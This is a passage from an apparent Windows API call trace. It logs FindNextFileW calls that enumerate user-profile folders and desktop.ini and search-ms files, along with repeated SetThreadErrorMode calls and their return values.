ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0250.166] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0250.166] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0250.166] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0250.166] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0250.167] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0250.167] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0250.167] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0250.167] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0250.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.167] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.168] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.168] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.168] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0250.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.168] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.168] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.168] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.168] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2fc) returned 1 [0250.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2fc) returned 1 [0250.171] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2fc) returned 1 [0250.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.174] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.174] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.174] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0250.174] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0250.175] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0250.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.175] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.176] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.176] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.176] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0250.176] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0250.176] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.180] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.180] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.180] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0250.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.180] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.180] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.180] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2fc) returned 1 [0250.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2fc) returned 1 [0250.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.184] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.184] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.184] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0250.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.185] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.185] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.185] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2fc) returned 1 [0250.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2fc) returned 1 [0250.188] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.188] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.188] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.188] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0250.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.188] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.188] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.188] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: 